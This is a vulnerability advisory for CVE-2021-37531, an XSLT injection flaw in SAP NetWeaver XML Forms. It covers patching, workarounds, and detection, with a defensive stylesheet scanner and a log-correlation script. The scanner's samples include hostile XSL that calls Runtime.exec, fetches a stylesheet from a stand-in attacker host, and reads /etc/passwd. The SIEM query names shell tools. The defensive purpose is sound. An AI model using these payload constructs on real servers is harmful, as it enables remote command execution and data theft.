CVE-2021-37531

8.8 HIGH

📋 TL;DR

CVE-2021-37531 is an XSLT injection vulnerability in SAP NetWeaver Knowledge Management XML Forms. An authenticated user without administrative privileges can craft an XSL stylesheet that embeds operating-system commands, store it in the repository as a .xsl file and have the server execute it when the stylesheet is processed, which yields arbitrary OS command execution with the privileges of the AS Java server process and can lead to complete compromise of the host. Affected releases are SAP NetWeaver 7.10, 7.11, 7.30, 7.31, 7.40 and 7.50.

💻 Affected Systems

Products:
  • SAP NetWeaver Knowledge Management XML Forms
Versions: 7.10, 7.11, 7.30, 7.31, 7.40, 7.50
Operating Systems: All platforms running SAP NetWeaver AS Java (Knowledge Management is platform-independent Java code)
Default Config Vulnerable: ⚠️ Yes
Notes: All installations with the XML Forms component deployed are vulnerable in the default configuration. Exploitation requires an authenticated user but no administrative privileges.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary OS commands, steal sensitive data, install malware, pivot to other systems, and maintain persistent access.

🟠

Likely Case

Attackers with authenticated access gain remote code execution, potentially compromising the SAP server and accessing sensitive business data.

🟢

If Mitigated

With proper network segmentation, least privilege access, and monitoring, impact is limited to the affected SAP system with containment preventing lateral movement.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ✅ No
Complexity: LOW

Public exploit code exists and has been weaponized. Exploitation requires an authenticated account but no administrative privileges; the injected XSLT leads directly to OS command execution with the privileges of the AS Java server process.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply the correction delivered with SAP Security Note 3081888 (a patch for the Knowledge Management software component of your NetWeaver release)

Vendor Advisory: https://launchpad.support.sap.com/#/notes/3081888

Restart Required: Yes

Instructions:

1. Read SAP Security Note 3081888 on the SAP Support Portal and download the patched Knowledge Management software component archive it references for your NetWeaver release from the SAP Software Download Center.
2. Deploy the archive to the AS Java system with the Software Update Manager (SUM). Knowledge Management runs on SAP NetWeaver AS Java, so the ABAP Note Assistant (transaction SNOTE) cannot apply this correction.
3. Restart the affected AS Java instances.
4. Verify in the AS Java system information (for example via SAP NetWeaver Administrator) that the deployed Knowledge Management component carries the patch level named in the note.

🔧 Temporary Workarounds

Restrict XSL file uploads

all

Restrict which users and groups may create or upload XSL stylesheets (and XML Forms projects) in the Knowledge Management repository, since exploitation requires writing a .xsl file there. Where uploads must stay enabled, inspect their content and reject stylesheets that declare extension namespaces exposing Java classes, embed script elements, or pull in external documents.

Network segmentation

all

Isolate SAP systems from critical infrastructure and implement strict firewall rules.
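The upload restriction above can be backed by content inspection. The following Python is an added example (not SAP code and not part of the vendor note) that flags the constructs an attacker-controlled stylesheet needs to reach the operating system: namespace declarations that bind XPath functions to host classes (Xalan's http://xml.apache.org/xalan/java/... binding is the classic case), embedded script elements, and xsl:include/xsl:import or document() calls that name absolute URIs. The namespace list, the sample stylesheets and the paths inside them are constructed assumptions, not material from the CVE.

```python
"""Inspect an uploaded XSL stylesheet for constructs that reach outside the transform.

Added illustrative example, not SAP code. The namespace list and heuristics are
assumptions about common XSLT engines, not derived from SAP Security Note 3081888.
"""
import io
import re
import xml.etree.ElementTree as ET
from typing import List

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Namespace URIs (or URI prefixes) through which a stylesheet can call into the host
# platform. Xalan maps any Java class under http://xml.apache.org/xalan/java/<class>.
HOST_ACCESS_NS = (
    "http://xml.apache.org/xalan/java",      # Xalan reflexive Java extension functions
    "http://xml.apache.org/xslt/java",       # older Xalan Java binding
    "http://xml.apache.org/xalan/redirect",  # redirect:write -> write arbitrary files
    "http://saxon.sf.net/java-type",         # Saxon reflexive Java calls
    "java:",                                 # Saxon-style java: prefixes
    "urn:schemas-microsoft-com:xslt",        # MSXML msxsl:script blocks
)
INCLUDE_ELEMENTS = {f"{{{XSL_NS}}}include", f"{{{XSL_NS}}}import"}
# XPath functions that fetch other documents (file:// or http:// URIs) at transform time.
EXTERNAL_FETCH = re.compile(r"\b(document|doc|unparsed-text)\s*\(", re.I)
# href values that are absolute URIs (scheme: or //) rather than repository-relative names.
ABSOLUTE_HREF = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:|//)", re.I)


def inspect_stylesheet(xsl_text: str) -> List[str]:
    """Return findings for one stylesheet; an empty list means nothing suspicious was seen."""
    findings: List[str] = []
    seen_root = False
    try:
        for event, payload in ET.iterparse(io.StringIO(xsl_text), events=("start-ns", "start")):
            if event == "start-ns":
                prefix, uri = payload
                if uri.startswith(HOST_ACCESS_NS):
                    findings.append(f"host-access namespace declared: {prefix or '(default)'}={uri}")
                continue
            elem = payload
            local = elem.tag.rsplit("}", 1)[-1]
            if not seen_root:
                seen_root = True
                if elem.tag not in (f"{{{XSL_NS}}}stylesheet", f"{{{XSL_NS}}}transform"):
                    findings.append(f"root element is {elem.tag}, not xsl:stylesheet")
            if local == "script":
                findings.append(f"embedded script element: {elem.tag}")
            if elem.tag in INCLUDE_ELEMENTS and ABSOLUTE_HREF.match(elem.get("href", "")):
                findings.append(f"{local} of external stylesheet: {elem.get('href')!r}")
            for name, value in elem.attrib.items():
                if EXTERNAL_FETCH.search(value):
                    findings.append(f"external document access in {local}/@{name}: {value!r}")
    except ET.ParseError as err:
        findings.append(f"not well-formed XML: {err}")
    return findings


# Constructed samples (not taken from the CVE or any SAP system).
BENIGN_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/form"><html><body><h1><xsl:value-of select="title"/></h1></body></html></xsl:template>
</xsl:stylesheet>"""

HOSTILE_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
  <xsl:template match="/"><xsl:value-of select="rt:exec(rt:getRuntime(), 'id')"/></xsl:template>
</xsl:stylesheet>"""

INCLUDE_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:include href="http://attacker.invalid/remote.xsl"/>
  <xsl:template match="/"><xsl:value-of select="document('file:///etc/passwd')"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_XSL), ("hostile", HOSTILE_XSL), ("include", INCLUDE_XSL)):
        print(label, inspect_stylesheet(text) or "OK")
```

The check runs on the raw upload before it is stored, so the stylesheet is never handed to an XSLT engine during inspection; any finding is grounds to reject the file and log the uploading user.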

🧯 If You Can't Patch

  • Implement strict access controls to limit authenticated user access to minimum required privileges
  • Deploy application-level firewalls (WAF) with XSLT injection detection rules

🔍 How to Verify

Check if Vulnerable:

Compare the deployed Knowledge Management component version against the patch level listed in SAP Security Note 3081888; any NetWeaver 7.10 to 7.50 system below that level is vulnerable. The note cannot be checked with the ABAP transaction SNOTE, because the correction is a Java component patch.

Check Version:

Open the AS Java system information page (for example via SAP NetWeaver Administrator) and read the version of the Knowledge Management software component. SAP GUI transactions such as SM51 report the ABAP server and do not show Java component patch levels.

Verify Fix Applied:

Confirm that the patched Knowledge Management component version appears in the system information after the restart, then render an existing XML Forms project with a known-good stylesheet to confirm the function still works.

📡 Detection & Monitoring

Log Indicators:

  • Unusual XSL file uploads
  • Suspicious OS command execution from SAP processes
  • Multiple failed authentication attempts followed by successful login

Network Indicators:

  • Unusual outbound connections from SAP servers
  • Traffic patterns indicating data exfiltration

SIEM Query:

(source="sap_audit_log" event="file_upload" (file_extension="xsl" OR file_extension="xslt"))
OR (source="endpoint_process_log" event="process_start" (parent_process="jstart" OR parent_process="java") (process="sh" OR process="bash" OR process="cmd.exe" OR process="powershell.exe"))

Field and source names are placeholders; map them to your audit-log and EDR schemas. Correlate the two clauses by host within a short window: a stylesheet upload followed by a shell spawned from the AS Java server process is the high-confidence pattern, while either event alone is lower confidence.
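The log indicators above amount to a correlation rule: a .xsl written by a user, then a shell started by the AS Java server process on the same host shortly afterwards. The following Python is an added example, not SAP or vendor code, that runs that rule over constructed JSON-lines events; the event format, field names and the jstart/sh image names are assumptions rather than a real SAP audit or EDR schema.

```python
"""Correlate XSL uploads with shell spawns from the AS Java server process.

Added illustrative example, not SAP or vendor code. The JSON-lines event format,
field names and process image names are assumptions; adapt them to your audit and
endpoint log sources.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Assumption: image names of the AS Java server process that would spawn a command.
SAP_PARENT_IMAGES = {"jstart", "jlaunch", "java"}
SHELL_IMAGES = {"sh", "bash", "dash", "ksh", "cmd.exe", "powershell.exe", "pwsh"}
STYLESHEET_SUFFIXES = (".xsl", ".xslt")

# Constructed sample events (not real SAP logs): a harmless PDF upload, an XSL upload
# followed eight seconds later by a shell from the server process on the same host,
# an uncorrelated shell spawn on a second host, and a benign sapcontrol child.
SAMPLE_EVENTS = [
    '{"ts":"2024-05-02T10:14:55Z","host":"sapj01","event":"file_upload","user":"jdoe","path":"/km/docs/reports/q1.pdf"}',
    '{"ts":"2024-05-02T10:15:01Z","host":"sapj01","event":"file_upload","user":"jdoe","path":"/km/docs/forms/orders.xsl"}',
    '{"ts":"2024-05-02T10:15:09Z","host":"sapj01","event":"process_start","parent_image":"/usr/sap/J01/J00/exe/jstart","image":"/bin/sh","cmdline":"sh -c id"}',
    '{"ts":"2024-05-02T11:40:00Z","host":"sapj02","event":"process_start","parent_image":"/usr/sap/J02/J00/exe/jstart","image":"/bin/bash","cmdline":"bash -c whoami"}',
    '{"ts":"2024-05-02T11:41:00Z","host":"sapj02","event":"process_start","parent_image":"/usr/sap/J02/J00/exe/jstart","image":"/usr/sap/J02/J00/exe/sapcontrol","cmdline":"sapcontrol -nr 00 -function GetProcessList"}',
]


def basename(path: str) -> str:
    """Last path component, lower-cased, for either / or \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def correlate(lines: List[str], window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Return one alert per shell spawned by the SAP server process.

    Severity is 'high' when a stylesheet upload on the same host precedes the spawn
    within `window`, otherwise 'medium' (still worth a look: the server process has
    no routine reason to start a shell).
    """
    uploads: List[Dict] = []
    alerts: List[Dict] = []
    for line in lines:
        ev = json.loads(line)
        ts = parse_ts(ev["ts"])
        if ev["event"] == "file_upload":
            if ev["path"].lower().endswith(STYLESHEET_SUFFIXES):
                uploads.append({"ts": ts, "host": ev["host"], "user": ev["user"], "path": ev["path"]})
        elif ev["event"] == "process_start":
            if basename(ev["parent_image"]) in SAP_PARENT_IMAGES and basename(ev["image"]) in SHELL_IMAGES:
                related = [u for u in uploads
                           if u["host"] == ev["host"] and timedelta(0) <= ts - u["ts"] <= window]
                alerts.append({
                    "severity": "high" if related else "medium",
                    "host": ev["host"],
                    "ts": ev["ts"],
                    "cmdline": ev["cmdline"],
                    "uploads": [f"{u['user']}:{u['path']}" for u in related],
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The rule keeps the uploads list in memory for the whole run; in a streaming deployment, expire entries older than the window so a long-lived process does not accumulate every stylesheet ever written.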

🔗 References
